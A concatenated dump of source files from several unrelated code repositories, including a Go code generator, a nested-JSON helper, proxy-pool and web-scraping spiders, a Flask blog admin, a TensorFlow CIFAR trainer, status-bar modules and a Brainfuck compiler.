def _set_check(self):
func = """
func %check%(ctx *gin.Context, req junebao_top.BaseReqInter) (junebao_top.BaseRespInter, error) {
request := req.(*message.%req%)
//TODO:...
return http.StatusOK, nil
}"""
func = f_text(func, self)
with open(f"./src/check/{self.routes[1]}.go", "a+") as fp:
fp.write(func)
def _set_message(self):
func = """
type %resp% struct {
Header junebao_top.BaseRespHeader `json:"header"`
}
type %req% struct {
}
func (r %req%) JSON(ctx *gin.Context) error {
return ctx.ShouldBindJSON(&r)
}"""
func = f_text(func, self)
with open(f"./src/message/{self.routes[1]}.go", "a+") as fp:
fp.write(func)
# api/server/list
def do(self):
self._get_route_func_name()
self._get_check_func_name()
self._get_server_func_name()
self._get_req_name()
self._get_resp_name()
self._set_route()
self._set_server()
self._set_check()
self._set_message()
if __name__ == '__main__':
path = sys.argv[1]
ct = CodeTool(path)
ct.do()
``` |
{
"source": "521274311/pyeasytd",
"score": 3
} |
#### File: pyeasytd/entries/json_easy.py
```python
from .__init__ import *
class JsonEasyEntry:
'''
Entity wrapper built on a JSON model, suited to reading regular, deeply nested JSON.
'''
__level_prefix = 'level_'
__init_load_status = False
__json = None
__json_text = None
__struct = None
__count = None
def __init__(self, data):
import json
# Accepts a JSON string (str/bytes/bytearray) or an already-parsed dict/list/tuple
if isinstance(data, (bytes, bytearray)):
data = data.decode('utf-8')
if isinstance(data, str):
self.__json = json.loads(data)
self.__json_text = data
elif isinstance(data, (dict, list, tuple)):
self.__json = data
self.__json_text = json.dumps(data)
self.__struct = {}
self.__count = {}
def print(self):
'''
Print the JSON describing the full flattened structure.
:return:
'''
import json
self.__init_load()
print(json.dumps(self.__struct))
def get(self, key, level: int=None):
'''
Get all results for a key.
:param key: dict key
:param level: nesting level, starting from 0; None means search every level
:return: list of results for the key (may contain several same-named keys)
'''
self.__init_load()
if BasicCheckUtil.is_none(level):
result_list = []
for level_key, value in self.__struct.items():
if BasicCheckUtil.non_none(value.get(key)):
result_list += value[key]
return result_list
level_key = self.__level_prefix + str(level)
return self.__struct[level_key][key]
def get_first(self, key, level: int=None):
'''
Get the first result for a key.
:param key: dict key
:param level: nesting level, starting from 0; None means search every level
:return: first element of the result list
'''
return self.get_one(key, 0, level)
def get_last(self, key, level: int=None):
'''
Get the last result for a key.
:param key: dict key
:param level: nesting level, starting from 0; None means search every level
:return: last element of the result list
'''
if BasicCheckUtil.is_none(level):
total = 0
for level_key, value in self.__count.items():
if BasicCheckUtil.non_none(value.get(key)):
total += value[key]
return self.get_one(key, total - 1, level)
level_key = self.__level_prefix + str(level)
return self.get_one(key, self.__count[level_key][key] - 1, level)
def get_one(self, key, index=0, level: int=None):
'''
Get the result at a given position for a key.
:param key: dict key
:param index: the index-th occurrence
:param level: nesting level, starting from 0; None means search every level
:return: the index-th element of the result list, starting from 0
'''
self.__init_load()
if BasicCheckUtil.is_none(level):
result_list = []
for level_key, value in self.__struct.items():
if BasicCheckUtil.non_none(value.get(key)):
result_list += value[key]
if len(result_list) > index:
return result_list[index]
return None
level_key = self.__level_prefix + str(level)
return self.__struct[level_key][key][index]
    def get_original_json(self):
        '''
        Get the original dict object passed in.
        :return: dict
        '''
        return self.__json
    def get_original_json_text(self):
        '''
        Get the original JSON string passed in.
        :return: str
        '''
        return self.__json_text
    def __init_load(self):
        '''
        Load the dict object.
        :return:
        '''
        if not self.__init_load_status:
            if self.__json is None:
                raise ValueError('No JSON object to load')
            self.__re_init_load(self.__json)
            self.__init_load_status = True
    def __re_init_load(self, param, level=0):
        '''
        Lift nested dict entries out into the per-level structure.
        :param param:
        :return:
        '''
level_key = self.__level_prefix + str(level)
if BasicCheckUtil.is_none(self.__struct.get(level_key)):
self.__struct[level_key] = {}
self.__count[level_key] = {}
if type(param) in (dict,):
for key, value in param.items():
count = self.__count[level_key].get(key)
if count is None:
count = 0
self.__struct[level_key][key] = []
self.__struct[level_key][key].insert(count, value)
count += 1
self.__count[level_key][key] = count
self.__re_init_load(value, level + 1)
elif type(param) in (list, tuple):
for single in param:
self.__re_init_load(single, level + 1)
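# A minimal usage sketch (hypothetical data); keys are flattened per nesting level,
# so get() can address any depth:
#     entry = JsonEasyEntry({'a': {'b': 1, 'c': [{'b': 2}]}})
#     entry.get('b')        # -> [1, 2]  (every 'b', at any level)
#     entry.get_first('b')  # -> 1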
``` |
{
"source": "5218664b/proxy_pool",
"score": 2
} |
#### File: proxy_pool/DB/DbClient.py
```python
__author__ = 'JHao'
import os
import sys
from Config.ConfigGetter import config
from Util.utilClass import Singleton
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
class DbClient(object):
"""
DbClient DB工厂类 提供get/put/pop/delete/getAll/changeTable方法
目前存放代理的table/collection/hash有两种:
raw_proxy: 存放原始的代理;
useful_proxy_queue: 存放检验后的代理;
抽象方法定义:
get(proxy): 返回proxy的信息;
put(proxy): 存入一个代理;
pop(): 弹出一个代理
exists(proxy): 判断代理是否存在
getNumber(raw_proxy): 返回代理总数(一个计数器);
update(proxy, num): 修改代理属性计数器的值;
delete(proxy): 删除指定代理;
getAll(): 返回所有代理;
changeTable(name): 切换 table or collection or hash;
所有方法需要相应类去具体实现:
SSDB:SsdbClient.py
REDIS:RedisClient.py 停用 统一使用SsdbClient.py
"""
__metaclass__ = Singleton
def __init__(self):
"""
init
:return:
"""
self.__initDbClient()
def __initDbClient(self):
"""
init DB Client
:return:
"""
__type = None
if "SSDB" == config.db_type:
__type = "SsdbClient"
elif "REDIS" == config.db_type:
__type = "SsdbClient"
elif "MONGODB" == config.db_type:
__type = "MongodbClient"
else:
pass
assert __type, 'type error, Not support DB type: {}'.format(config.db_type)
self.client = getattr(__import__(__type), __type)(name=config.db_name,
host=config.db_host,
port=config.db_port,
password=config.db_password)
def get(self, key, **kwargs):
return self.client.get(key, **kwargs)
def put(self, key, **kwargs):
return self.client.put(key, **kwargs)
def update(self, key, value, **kwargs):
return self.client.update(key, value, **kwargs)
def delete(self, key, **kwargs):
return self.client.delete(key, **kwargs)
def exists(self, key, **kwargs):
return self.client.exists(key, **kwargs)
def pop(self, **kwargs):
return self.client.pop(**kwargs)
def getAll(self):
return self.client.getAll()
def getAllUserAgent(self):
return self.client.getAllUserAgent()
def changeTable(self, name):
self.client.changeTable(name)
def getNumber(self):
return self.client.getNumber()
if __name__ == "__main__":
account = DbClient()
account.changeTable('useful_proxy')
print(account.pop())
``` |
{
"source": "5218664b/WebCrawler",
"score": 3
} |
#### File: pornhub/spiders/porn.py
```python
import scrapy
import json
import re
import sys
import requests
from pornhub.items import PornhubItem
'''
python 2.7
pip install --user PyQt4-4.11.4-cp27-cp27m-win_amd64.whl
pip install Ghost.py
'''
# D:/ProgramData/Anaconda3/Scripts/activate.bat erdianqi
# scrapy crawl porn -o porn.json -s FEED_EXPORT_ENCODING=utf-8
class PornSpider(scrapy.Spider):
def __init__(self):
self.webkit_session = None
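        # NOTE: parse_video_link() calls self.webkit_session.evaluate(); a browser
        # session (e.g. Ghost.py, per the install notes above) must be assigned first.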
name = 'porn'
start_urls = ['www.baidu.com']
fileName = 'pornhub.links'
searchKey = 'japanese'
def start_requests(self):
currentPageNum = 1
endPageNum = 1
while currentPageNum <= endPageNum:
url = 'https://www.pornhub.com/video/search?search=' + self.searchKey + '&page=' + str(currentPageNum)
#url = 'https://jp.pornhub.com/video'
yield scrapy.Request(
url,
callback=self.parse_search_result,
headers={
'Cookie' : 'bs=p6za8azsjwg9ijyn970f8vgx3ehieuc4; ss=430400793297104506; ua=db71e63d841d64be86149f315e465d5f; platform_cookie_reset=pc; platform=pc; RNKEY=1447123*1687583:3567443335:1032885732:1; RNLBSERVERID=ded6942',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
}
)
currentPageNum = currentPageNum + 1
def parse_search_result(self,response):
links = response.xpath('//div[@class="img fade fadeUp videoPreviewBg"]/a')
for link in links:
            url = 'https://www.pornhub.com' + link.xpath('@href').extract_first()
yield scrapy.Request(
url,
callback=self.parse_video_link
)
def parse_video_link(self, response):
find_quality = ['quality_1080p', 'quality_720p', 'quality_480p', 'quality_240p']
for quality in find_quality:
video_url = self.webkit_session.evaluate(quality)
if video_url[0] is not None:
break
pornhubItem = PornhubItem()
pornhubItem['url'] = response.url
        pornhubItem['title'] = response.xpath('//title/text()').extract_first()
pornhubItem['videoUrl'] = str(video_url[0])
yield pornhubItem
with open(self.fileName,'a') as f:
f.write(pornhubItem['videoUrl']+ '\n')
```
#### File: qzonespider/spiders/comment.py
```python
import scrapy
import os
import json
import re
import sys
import requests
from qzonespider.items import QzonespiderItem
from scrapy.conf import settings
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
import json
#scrapy crawl comment -o comment.json -s FEED_EXPORT_ENCODING=utf-8
class CommentSpider(scrapy.Spider):
def __init__(self, *args, **kwargs):
super(CommentSpider, self).__init__(**kwargs)
self.cookieStr = args[0]['cookie']
self.gtk = args[0]['gtk']
name = 'comment'
allowed_domains = ['qq.com']
start_urls = ['https://user.qzone.qq.com/1141802674']
    # QQ account number
account = '1141802674'
def parse(self, response):
url = 'https://user.qzone.qq.com/proxy/domain/m.qzone.qq.com/cgi-bin/new/get_msgb\
?uin=%s&hostUin=%s&num=10&start=1&inCharset=utf-8&outCharset=utf-8&format=jsonp&g_tk=%s' % (self.account, self.account,self.gtk)
yield scrapy.Request(
url
,method='GET'
,callback=self.request_comment
,cookies=self.cookieStr
)
def request_comment(self, response):
json_body = json.loads(str(response.text)[10:-2])['data']
comment_total = int(json_body['total'])
        for index in range(comment_total // 10 + 1):
url = 'https://user.qzone.qq.com/proxy/domain/m.qzone.qq.com/cgi-bin/new/get_msgb\
?uin=%s&hostUin=%s&num=10&start=%s&inCharset=utf-8&outCharset=utf-8&format=jsonp&g_tk=%s' % (self.account, self.account, index*10, self.gtk)
yield scrapy.Request(
url
,method='GET'
,callback=self.parse_comment
,cookies=self.cookieStr
)
def parse_comment(self, response):
json_body = json.loads(str(response.text)[10:-2])['data']
commentItems = QzonespiderItem()
commentItems['comment'] = json_body['commentList']
yield commentItems
``` |
{
"source": "521xueweihan/IPProxyTool",
"score": 2
} |
#### File: spiders/proxy/xicidaili.py
```python
from proxy import Proxy
from basespider import BaseSpider
from scrapy.selector import Selector
class XiCiDaiLiSpider(BaseSpider):
name = 'xici'
def __init__(self, *a, **kw):
super(XiCiDaiLiSpider, self).__init__(*a, **kw)
self.urls = ['http://www.xicidaili.com/nn/%s' % n for n in range(1, 2)]
self.headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.5',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Host': 'www.xicidaili.com',
'If-None-Match': 'W/"cb655e834a031d9237e3c33f3499bd34"',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0',
}
self.init()
def parse_page(self, response):
sel = Selector(text = response.body)
infos = sel.xpath('//tr[@class="odd"]').extract()
for info in infos:
val = Selector(text = info)
ip = val.xpath('//td[2]/text()').extract_first()
port = val.xpath('//td[3]/text()').extract_first()
country = val.xpath('//td[4]/a/text()').extract_first()
anonymity = val.xpath('//td[5]/text()').extract_first()
https = val.xpath('//td[6]/text()').extract_first()
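            # the parsed `https` value above is currently unused; set_value below hard-codes 'no'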
proxy = Proxy()
proxy.set_value(
ip = ip,
port = port,
country = country,
anonymity = anonymity,
https = 'no',
speed = 1,
source = self.name,
)
self.add_proxy(proxy = proxy)
```
#### File: spiders/validator/httpbin.py
```python
from validator import Validator
class HttpBinSpider(Validator):
name = 'httpbin'
def __init__(self, name = None, **kwargs):
super(HttpBinSpider, self).__init__(name, **kwargs)
self.timeout = 5
self.urls = [
'http://httpbin.org/get'
]
self.init()
``` |
{
"source": "521xueweihan/pyhub",
"score": 2
} |
#### File: pyhub/views/__init__.py
```python
import functools
from flask import session, abort, render_template
from config import PASSWORD
from server import app
def login(f):
@functools.wraps(f)
def warp_fun(*args, **kwargs):
if PASSWORD != session.get('password'):
abort(404)
else:
return f(*args, **kwargs)
return warp_fun
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
```
#### File: pyhub/views/manage.py
```python
import uuid
from datetime import datetime
from peewee import IntegrityError
from flask import render_template, redirect, request, flash, abort
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import InputRequired, URL
from wtforms.widgets import TextArea
from models.blog import Blog
from pyhub import app, logger
from views import login
class BlogForm(FlaskForm):
name = StringField('name', validators=[InputRequired()])
url = StringField('url', validators=[URL()])
description = StringField('description', widget=TextArea())
@app.route('/manage/')
@login
def manage():
all_blog = Blog.select().order_by(Blog.create_time.desc())
form = BlogForm()
logger.info('%s|request manage page' % request.remote_addr)
return render_template('manage.html', blogs=all_blog, form=form)
@app.route('/manage/create/', methods=['POST'])
@login
def create():
form = BlogForm()
if form.validate_on_submit():
try:
blog = Blog.create(
blog_id=uuid.uuid4(), name=form.name.data, url=form.url.data,
description=form.description.data)
            flash(u'Created {name} successfully'.format(name=blog.name))
except IntegrityError:
            flash(u'Failed to create {name}: the entry already exists'.format(name=form.name.data), 'error')
else:
        flash(u'Creation failed: invalid parameters', 'error')
return redirect('/manage')
@app.route('/manage/update/<blog_id>', methods=['GET', 'POST'])
@login
def update(blog_id):
blog = Blog.get(Blog.blog_id == blog_id)
if not blog:
abort(400)
form = BlogForm(name=blog.name, url=blog.url, description=blog.description)
if request.method == 'GET':
return render_template('update.html', blog=blog, form=form)
else:
if form.validate_on_submit():
try:
blog.name = form.name.data
blog.url = form.url.data
blog.description = form.description.data
blog.update_time = datetime.now()
blog.save()
                flash(u'Updated {name} successfully'.format(name=form.name.data))
return redirect('/manage')
except IntegrityError:
                flash(u'Failed to update {name}: the entry already exists'.format(name=form.name.data), 'error')
return render_template('update.html', blog=blog, form=form)
else:
            flash(u'Update failed: invalid parameters', 'error')
return render_template('update.html', blog=blog, form=form)
@app.route('/manage/status/<blog_id>', methods=['GET'])
@login
def status(blog_id):
blog = Blog.get(Blog.blog_id == blog_id)
if not blog:
abort(400)
if blog.status:
blog.status = 0
        flash(u'{name} taken offline successfully'.format(name=blog.name))
else:
blog.status = 1
        flash(u'{name} brought online successfully'.format(name=blog.name))
blog.update_time = datetime.now()
blog.save()
return redirect('/manage')
``` |
{
"source": "5220243/taili_code_case",
"score": 3
} |
#### File: 5220243/taili_code_case/CNN_train.py
```python
import numpy as np
import tensorflow as tf
import logging
from CNN_input import read_dataset
logging.basicConfig(format='%(levelname)s:%(asctime)s %(message)s', level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
DATASET_DIR = r'C:\Users\PycharmProjects\Cifar'
N_FEATURES = 3072 # 3072 = 32*32*3
N_CLASSES = 7 # Number of Classes
N_FC1 = 512
N_FC2 = 256
BATCH_SIZE = 128
TEST_BATCH_SIZE = 5000
TRAINING_EPOCHS = 10000
DISPLAY_STEP = 50
SAVE_STEP = 1000
BASEDIR = './New_LOG/'
BETA = 0.01
N_dp = 0.5  # dropout keep_prob used below; the value is an assumed default, it is not specified elsewhere in this file
cifar10 = read_dataset(DATASET_DIR, onehot_encoding=True)
logging.info('TRAIN: {}\nEVAL: {}'.format(cifar10.train.images.shape, cifar10.eval.images.shape))
def conv_layer(inpt, k, s, channels_in, channels_out, name='CONV'):
with tf.name_scope(name):
W = tf.Variable(tf.truncated_normal(
[k, k, channels_in, channels_out], stddev=0.1), name='W')
b = tf.Variable(tf.constant(0.1, shape=[channels_out]), name='b')
conv = tf.nn.conv2d(inpt, W, strides=[1, s, s, 1], padding='SAME')
act = tf.nn.relu(conv)
tf.summary.histogram('weights', W)
tf.summary.histogram('biases', b)
tf.summary.histogram('activations', act)
return act
def pool_layer(inpt, k, s, pool_type='mean'):
    if pool_type == 'mean':
return tf.nn.avg_pool(inpt,
ksize=[1, k, k, 1],
strides=[1, s, s, 1],
padding='SAME',
name='POOL')
else:
return tf.nn.max_pool(inpt,
ksize=[1, k, k, 1],
strides=[1, s, s, 1],
padding='SAME',
name='POOL')
def fc_layer(inpt, neurons_in, neurons_out, last=False, name='FC'):
with tf.name_scope(name):
W = tf.Variable(tf.truncated_normal(
[neurons_in, neurons_out]), name='W')
b = tf.Variable(tf.constant(0.1, shape=[neurons_out]), name='b')
tf.summary.histogram('weights', W)
tf.summary.histogram('biases', b)
if last:
act = tf.add(tf.matmul(inpt, W), b)
else:
act = tf.nn.relu(tf.add(tf.matmul(inpt, W), b))
tf.summary.histogram('activations', act)
return act
def cifar10_model(learning_rate, batch_size):
tf.reset_default_graph()
with tf.Session() as sess:
x = tf.placeholder(tf.float32, shape=[None, N_FEATURES], name='x')
x_image = tf.transpose(tf.reshape(x, [-1, 3, 32, 32]), perm=[0, 2, 3, 1])
tf.summary.image('input', x_image, max_outputs=3)
y = tf.placeholder(tf.float32, [None, N_CLASSES], name='labels')
phase = tf.placeholder(tf.bool, name='PHASE')
conv1 = conv_layer(x_image, 5, 1, channels_in=3, channels_out=64)
with tf.name_scope('BN'):
norm1 = tf.contrib.layers.batch_norm(conv1, center=True, scale=True, is_training=phase)
pool1 = pool_layer(norm1, 3, 2, pool_type='mean')
conv2 = conv_layer(pool1, 5, 1, channels_in=64, channels_out=64)
with tf.name_scope('BN'):
norm2 = tf.contrib.layers.batch_norm(conv2, center=True, scale=True, is_training=phase)
pool2 = pool_layer(norm2, 3, 2, pool_type='mean')
flattend = tf.reshape(pool2, shape=[-1, 8 * 8 * 64])
fc1 = fc_layer(flattend, neurons_in=8 * 8 * 64, neurons_out=N_FC1)
with tf.name_scope('BN'):
norm3 = tf.contrib.layers.batch_norm(fc1, center=True, scale=True, is_training=phase)
fc1_dropout = tf.nn.dropout(norm3,N_dp)
fc2 = fc_layer(fc1_dropout, neurons_in=N_FC1, neurons_out=N_FC2, last=True)
with tf.name_scope('BN'):
norm4 = tf.contrib.layers.batch_norm(fc2, center=True, scale=True, is_training=phase)
fc2_dropout = tf.nn.dropout(norm4,N_dp)
logits = fc_layer(fc2_dropout, neurons_in=N_FC2, neurons_out=N_CLASSES, last=True)
trainable_vars = tf.trainable_variables()
with tf.name_scope('loss'):
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=y)) + \
BETA * tf.add_n([tf.nn.l2_loss(v)
for v in trainable_vars if not 'b' in v.name])
tf.summary.scalar('loss', loss)
with tf.name_scope('train'):
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_step = tf.train.AdamOptimizer(learning_rate).minimize(loss)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', accuracy)
merged_summary = tf.summary.merge_all()
init = tf.global_variables_initializer()
saver = tf.train.Saver()
sess.run(init)
LOGDIR = BASEDIR + 'lr={:.0E},bs={}'.format(learning_rate, batch_size)
summary_writer = tf.summary.FileWriter(LOGDIR, graph=sess.graph)
eval_writer = tf.summary.FileWriter(LOGDIR + '/eval')
for i in range(TRAINING_EPOCHS):
batch_x, batch_y = cifar10.train.next_batch(batch_size)
sess.run(train_step, feed_dict={x: batch_x, y: batch_y, phase: 1})
if i % DISPLAY_STEP == 0:
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
s, lss, acc , _ = sess.run([merged_summary, loss, accuracy, train_step],
feed_dict={x: batch_x, y: batch_y, phase: 1},
options=run_options,
run_metadata=run_metadata)
summary_writer.add_run_metadata(run_metadata, 'step{}'.format(i))
summary_writer.add_summary(s, i)
                test_acc = []
                for batch in range(cifar10.eval.num_exzamples // TEST_BATCH_SIZE):
                    batch_x, batch_y = cifar10.eval.next_batch(TEST_BATCH_SIZE)
                    test_acc.append(sess.run(accuracy, feed_dict={x: batch_x, y: batch_y, phase: 0}))
                eval_writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag='eval_accuracy', simple_value=np.mean(test_acc))]), i)
                logging.info('Iter={}, loss={}, training_accuracy={}, test_accuracy={}'.format(i+1, lss, acc, np.mean(test_acc)))
LOGDIR = saver.save(sess, LOGDIR + '/model.ckpt')
logging.info('Model saved in file: {}'.format(LOGDIR))
def main():
for lr in [1e-2]:#, 1e-3, 1e-4]: # Save some results with different learning rate(lr) and batch size(bs)
for bs in [64]:#, 128]:
logging.info('learing rate = {:.0E}, batch size = {}'.format(lr, bs))
cifar10_model(lr, bs)
if __name__ == '__main__':
main()
``` |
{
"source": "5225225/bar",
"score": 3
} |
#### File: bar/modules/df.py
```python
import signal
import linelib
import subprocess
class filesystem:
def __init__(self, device, total, used, free, mount):
self.device = device
self.total = total
self.used = used
self.free = free
self.mount = mount
def fsfromline(line):
x = line.split()
print(x)
return filesystem(x[0], x[1], x[2], x[3], x[5])
def handler(x, y):
pass
signal.signal(signal.SIGUSR1, handler)
signal.signal(signal.SIGALRM, handler)
ID = "df"
wanted = ["/", "/home/jack/mount/NAS/downloads"]
names = {"/": "/", "/home/jack/mount/NAS/downloads": "NAS"}
while True:
fslines = subprocess.check_output(["df", "-h"]).decode("utf-8").split("\n")
fslines = fslines[1:-1]
filesystems = []
for line in fslines:
fs = fsfromline(line)
if fs.mount in wanted:
filesystems.append(fs)
blocks = []
formatstr = "{}: {}/{}"
for item in filesystems:
blocks.append(formatstr.format(names[item.mount], item.used,
item.total))
linelib.sendblock(ID, {"full_text": " || ".join(blocks)})
linelib.sendPID(ID)
linelib.waitsig(1)
```
#### File: bar/modules/mpd.py
```python
import socket
import signal
import linelib
import time
import json
ID = "mpd"
def darken(hexcode, amount=.5):
r = int(int(hexcode[1:3], 16) * amount)
g = int(int(hexcode[3:5], 16) * amount)
b = int(int(hexcode[5:7], 16) * amount)
return "#{:x}{:x}{:x}".format(r, g, b)
def handler(x, y):
pass
signal.signal(signal.SIGUSR1, handler)
signal.signal(signal.SIGALRM, handler)
def mpd2dict(output):
x = output.split("\n")
d = dict()
for item in x[:-2]:
# MPD returns OK at the end, and there's a newline. This skips both of
# them.
key, val = item.split(":", maxsplit=1)
val = val.lstrip()
d[key] = val
return d
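# e.g. mpd2dict("volume: 100\nrepeat: 0\nOK\n") == {"volume": "100", "repeat": "0"}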
def sendline():
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("localhost", 6600))
except ConnectionRefusedError:
time.sleep(1)
return
except OSError:
time.sleep(1)
return
try:
version = sock.recv(2048)
except InterruptedError:
pass
    assert version.startswith(b"OK MPD")  # accept any MPD protocol version
sock.send(b"currentsong\n")
currsong = mpd2dict(sock.recv(2048).decode("UTF-8"))
if currsong == {}:
return
sock.send(b"status\n")
status = mpd2dict(sock.recv(2048).decode("UTF-8"))
infodict = currsong.copy()
infodict.update(status)
artistcolour = "#a1b56c"
titlecolour = "#ac4142"
albumcolour = "#6a9fb5"
if infodict["state"] == "pause":
titlecolour = darken(titlecolour)
albumcolour = darken(albumcolour)
artistcolour = darken(artistcolour)
block = "<span foreground='{}'>{}</span>"
for item in ["Artist", "Title", "Album"]:
if item not in infodict:
infodict[item] = "Unknown {}".format(item)
fmline = "{} - {} - {}".format(
block.format(artistcolour,infodict["Artist"]),
block.format(titlecolour,infodict["Title"]),
block.format(albumcolour,infodict["Album"]),
)
    formatcodes = fmline.replace("&", "&amp;")  # escape ampersands for pango markup
linelib.sendblock(ID, {"full_text": formatcodes, "markup": "pango"})
linelib.sendPID(ID)
linelib.waitsig(1)
click = linelib.getclick(ID).decode("UTF-8")
if click != "":
x = json.loads(click)
if x["button"] == 1:
sock.send(b"pause\n")
while True:
sendline()
```
#### File: bar/modules/ping.py
```python
import signal
import linelib
import subprocess
def handler(x, y):
pass
signal.signal(signal.SIGUSR1, handler)
signal.signal(signal.SIGALRM, handler)
ID = "ping"
toping = "8.8.8.8"
while True:
try:
raw = subprocess.check_output(["ping", "-c1", toping])
line = raw.decode("UTF8").split("\n")[1]
time = line.split(" ")[6][5:]
linelib.sendblock(ID, {"full_text": "{}ms".format(time)})
linelib.sendPID(ID)
linelib.waitsig(5)
    except subprocess.CalledProcessError:
        linelib.sendblock(ID, {"full_text": "NOT CONNECTED",
                               "color": "#ff0000"})
        linelib.waitsig(1)
```
#### File: bar/modules/timeblock.py
```python
import linelib
import datetime
import signal
def handler(x, y):
pass
signal.signal(signal.SIGUSR1, handler)
signal.signal(signal.SIGALRM, handler)
while True:
linelib.sendblock("date", {"full_text": datetime.datetime.now().strftime(
"%Y-%m-%e %H:%M:%S"
)})
linelib.sendPID("date")
linelib.waitsig(1)
```
#### File: bar/modules/updates.py
```python
import signal
import linelib
import subprocess
def handler(x, y):
pass
signal.signal(signal.SIGUSR1, handler)
signal.signal(signal.SIGALRM, handler)
ID = "updates"
while True:
updates = subprocess.check_output(["/usr/bin/pacaur", "-Qua"]).decode(
"ASCII").strip().split("\n")
linelib.sendblock(ID, {"full_text": str(len(updates))})
linelib.sendPID(ID)
linelib.waitsig(1)
``` |
{
"source": "5225225/brainfuck-asm",
"score": 3
} |
#### File: 5225225/brainfuck-asm/brainfuck-compiler.py
```python
import sys
TMP_VARS = 4
MAX_MEM_SIZE = 256
# XXX PROGRAMS GETTING INPUT **MUST** HAVE NEWLINE AT END XXX
def convert(instr, converter):
out = ""
for ch in instr:
if ch in converter:
out += converter[ch]
return out
def simplify(prog):
while "<>" in prog or "><" in prog:
prog = prog.replace("<>", "")
prog = prog.replace("><", "")
return prog
def escapes(text):
inpt = list(text)
out = ""
while inpt:
ch = inpt.pop(0)
if ch == "\\":
esccode = inpt.pop(0)
if esccode == "n":
out += "\n"
if esccode == "\\":
out += "\\"
if esccode == "\s":
out += " "
else:
out += ch
return out
def runfunc(cmd, args):
global variables
global varcounter
global out
if cmd == "var":
variables[args[0]] = varcounter
varcounter += 1
if cmd == "space":
varcounter += int(args[0])
if cmd == "litprint":
lit = escapes(" ".join(args))
curr = 0
for ch in lit:
delta = ord(ch) - curr
if delta > 0:
out += "+"*abs(delta)
if delta < 0:
out += "-"*abs(delta)
if delta == 0:
pass
out += "."
curr = ord(ch)
runfunc("zero", ["tmp_litprint"])
if cmd == "strlit":
variables[args[0]] = varcounter
lit = escapes(" ".join(args[1:]))
out += ">"
out += ">"*varcounter
for ch in lit:
out += "+"*ord(ch)
out += ">"
out += "<"*len(lit)
out += "<"*varcounter
out += "<"
varcounter += len(lit) + 2
if cmd == "str":
variables[args[0]] = varcounter
strlen = int(args[1])
out += ">"
out += ">"*varcounter
for ch in range(strlen):
out += "+"
out += ">"
out += "<"*strlen
out += "<"*varcounter
out += "<"
varcounter += strlen + 2
if cmd == "split2":
source, var1, var2 = args
source = variables[source]
var1 = variables[var1]
var2 = variables[var2]
_ = """
Go to source
While source is not 0
decrement source by one
go to var1
increment var1 by one
go to var2
increment var2 by one
go to source
"""
out += ">" * source
out += "["
out += "-"
out += "<" * source
out += ">" * var1
out += "+"
out += "<" * var1
out += ">" * var2
out += "+"
out += "<" * var2
out += ">" * source
out += "]"
out += "<" * source
if cmd == "move":
source, dest = args
source = variables[source]
dest = variables[dest]
_ = """
Go to source
While source is not 0
decrement source by one
go to dest
increment dest by one
"""
out += ">" * source
out += "["
out += "-"
out += "<" * source
out += ">" * dest
out += "+"
out += "<" * dest
out += ">" * source
out += "]"
out += "<"*source
if cmd == "copy":
x, y = args
runfunc("split2", [x, "tmp_0", "tmp_1"])
runfunc("move", ["tmp_0", x])
runfunc("move", ["tmp_1", y])
if cmd == "inc":
var, count = args
vc = variables[var]
out += ">"*vc
out += "+"*int(count)
out += "<"*vc
if cmd == "dec":
var, count = args
vc = variables[var]
out += ">"*vc
out += "-"*int(count)
out += "<"*vc
if cmd == "break":
out += "#"
if cmd == "add":
x, y = args
runfunc("copy", [y, "tmp_2"])
runfunc("move", ["tmp_2", x])
if cmd == "mult":
x, y = args
runfunc("copy", [y, "tmp_3"])
runfunc("dec", ["tmp_3", "1"])
runfunc("while", ["tmp_3"])
runfunc("add", [x, x])
runfunc("dec", ["tmp_3", "1"])
runfunc("end_while", ["tmp_3"])
if cmd == "putch":
x = variables[args[0]]
out += ">"*x
out += "."
out += "<"*x
if cmd == "getch":
x = variables[args[0]]
out += ">"*x
out += ","
out += "<"*x
if cmd == "while":
x = variables[args[0]]
out += ">"*x
out += "["
out += "<"*x
if cmd == "end_while":
x = variables[args[0]]
out += ">"*x
out += "]"
out += "<"*x
if cmd == "if":
x = args[0]
n = 0
while "if_cond{}".format(n) in variables:
n += 1
runfunc("var", ["if_cond{}".format(n)])
runfunc("copy", [x, "if_cond{}".format(n)])
out += ">"*variables["if_cond{}".format(n)]
out += "["
out += "<"*variables["if_cond{}".format(n)]
runfunc("zero", ["if_cond{}".format(n)])
if cmd == "end_if":
n = 0
while "if_cond{}".format(n) in variables:
n += 1
cond = variables["if_cond{}".format(n-1)]
out += ">"*cond
out += "]"
out += "<"*cond
if cmd == "sub":
x, y = args
xv = variables[x]
yv = variables[y]
runfunc("copy", [y, "tmp_2"])
out += ">" * yv
out += "[-"
out += "<" * yv
out += ">" * xv
out += "-"
out += "<" * xv
out += ">" * yv
out += "]"
out += "<" * yv
runfunc("move", ["tmp_2", y])
if cmd == "zero":
x = args[0]
x = variables[x]
out += ">"*x
out += "[-]"
out += "<"*x
if cmd == "print":
s = variables[args[0]]
out += ">"*s
out += ">"
out += "[.>]"
out += "<"
out += "[<]"
out += "<"*s
if cmd == "read":
s = variables[args[0]]
